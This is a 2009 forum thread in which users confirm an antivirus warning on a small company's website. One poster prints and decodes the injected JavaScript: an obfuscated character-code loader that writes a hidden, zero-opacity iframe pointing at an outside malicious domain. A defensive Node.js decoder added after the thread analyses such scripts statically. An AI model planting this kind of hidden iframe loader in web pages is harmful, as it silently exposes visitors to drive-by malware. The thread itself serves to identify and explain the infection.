| Press F1 | ||||
| Thread ID: 100444 | 2009-06-08 02:16:00 | Virus on web-page?? | notechyet (4479) |
| Post ID | Timestamp | Content | User | ||
| 780525 | 2009-06-08 02:16:00 | Hello I just wanted to check out an engineer and when I went to www. t f e l .co.nz/ web-site my Avast warned me of a Trojan horse virus being present. Would someone be able to verify this for me? Thanks |
notechyet (4479) | ||
| 780526 | 2009-06-08 02:32:00 | Clicked on your link, NOD32 also blocked it. 8/06/2009 1:31:06 p.m. HTTP filter file www. t f e l .co.nz JS/Kryptik.F virus connection terminated - quarantined ROB-NB\Rob Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe. |
Rob99 (151) | ||
| 780527 | 2009-06-08 02:41:00 | Hi Rob Thanks for testing! I'll contact the owner of the web-page as I sort of know them. |
notechyet (4479) | ||
| 780528 | 2009-06-08 04:27:00 | Just a bit more Info -- Information On Infections (www.imagef1.net.nz) -- bottom right the name of the infection. | wainuitech (129) | ||
| 780529 | 2009-06-08 04:41:00 | Hmm, according to Google that's what the torrent version of the Windows 7 beta had in it too. JS probably means it runs in / as part of JavaScript? | Speedy Gonzales (78) | ||
| 780530 | 2009-06-08 04:42:00 | Nice to know Avast also identified it, NOD sure does. | pctek (84) | ||
| 780531 | 2009-06-08 04:55:00 | Safari blocked it | plod (107) | ||
| 780532 | 2009-06-08 05:48:00 | The offending code is this: <script type="text/javascript">var hdOruVsHnKBXZuvtsRmw = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z116z112z58z47z47z114z110z119z46z107z122z47z105z110z100z101z120z46z112z104z112z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z109z101z62";var kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");var TEptzkmsBZolwWqWunem = "";for (var KYLMhcILlLcFQRyPBlHD=1; KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.length; KYLMhcILlLcFQRyPBlHD++){TEptzkmsBZolwWqWunem+=String.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);}document.write(TEptzkmsBZolwWqWunem)</script> What it does is embed an invisible iframe in the page that points to [edited], resulting in that page loading without the user being aware of it. That page is probably the one containing the virus. Edit: For those interested in the unscrambled version of the above JavaScript, here it is (newlines & indentation added by me): <iframe width="480" height="60" src="rnw.kz style=" border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0 " > </iframe> |
Erayd (23) | ||
| 780533 | 2009-06-08 06:07:00 | Um guys, can you please not post clickable links to websites that contain viruses? I've broken the URLs up so they aren't clickable (from curious newbies), and edited out Erayd's link as it tried to load when I previewed his post - luckily avast caught it and stopped the page loading. |
Jen (38) | ||
| 780534 | 2009-06-08 06:25:00 | Oops.... good point, I didn't think of the implications there - just figured people would be interested in the dissection, rather than actually trying to click through to the nasties. Sorry! | Erayd (23) | ||
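
The decoding described in post 780532, done statically, as an added example that is not part of the thread: it recovers the markup from a delimiter-separated run of decimal character codes without running the script, tolerates whitespace that a word-wrapped paste introduces into the literal, and flags styles that hide an iframe. The function names, the trait list and the `example.invalid` sample are assumptions made for illustration.

```javascript
// Static triage of "delimiter + decimal char code" obfuscation: no eval, no DOM.
// A literal qualifies if it is one letter + 1-3 digits, repeated with the same letter.
const CODE_RUN = /^([A-Za-z])\d{1,3}(?:\1\d{1,3}){7,}$/;

// Style traits that hide an injected frame from the visitor.
const HIDING_TRAITS = [
  ["zero opacity", /opacity\s*[:=]\s*0(?![.\d])/i],
  ["off-screen offset", /\b(?:left|top)\s*:\s*-\d{2,}px/i],
  ["display:none", /\bdisplay\s*:\s*none/i],
  ["visibility:hidden", /\bvisibility\s*:\s*hidden/i],
];

// Decode every double-quoted literal that looks like an encoded run.
function decodeLiterals(source) {
  const decoded = [];
  for (const [, raw] of source.matchAll(/"([^"]*)"/g)) {
    const body = raw.replace(/\s+/g, ""); // undo word-wrap spaces added by forums or mail
    const m = CODE_RUN.exec(body);
    if (!m) continue;
    const codes = body.split(m[1]).slice(1).map(Number);
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Report what each decoded literal would have written into the page.
function triage(source) {
  return decodeLiterals(source).map((html) => {
    const traits = HIDING_TRAITS.filter(([, re]) => re.test(html)).map(([name]) => name);
    const src = (/\bsrc\s*=\s*["']([^"']*)["']/i.exec(html) || [])[1] || null;
    return { html, src, traits, hiddenIframe: /<iframe\b/i.test(html) && traits.length > 0 };
  });
}

// Constructed sample, not the script from the thread; example.invalid is a placeholder.
const zEncode = (text) => [...text].map((c) => "z" + c.charCodeAt(0)).join("");
const SAMPLE_HTML = '<iframe width="480" height="60" src="http://example.invalid/" ' +
  'style="border:0px; position:relative; left:-500px; opacity:0"></iframe>';
// Insert a space every 50 characters to mimic a word-wrapped paste.
const wrapped = zEncode(SAMPLE_HTML).replace(/(.{50})/g, "$1 ");
const SAMPLE_SCRIPT = `<script type="text/javascript">var a = "${wrapped}";` +
  'var b = a.split("z");var c = "";for (var i = 1; i < b.length; i++)' +
  "{c += String.fromCharCode(b[i]);}document.write(c)</script>";

console.log(triage(SAMPLE_SCRIPT));
```

Run it with Node.js on a saved copy of the page source; the report gives the frame's `src` and the hiding traits without the browser ever requesting that address.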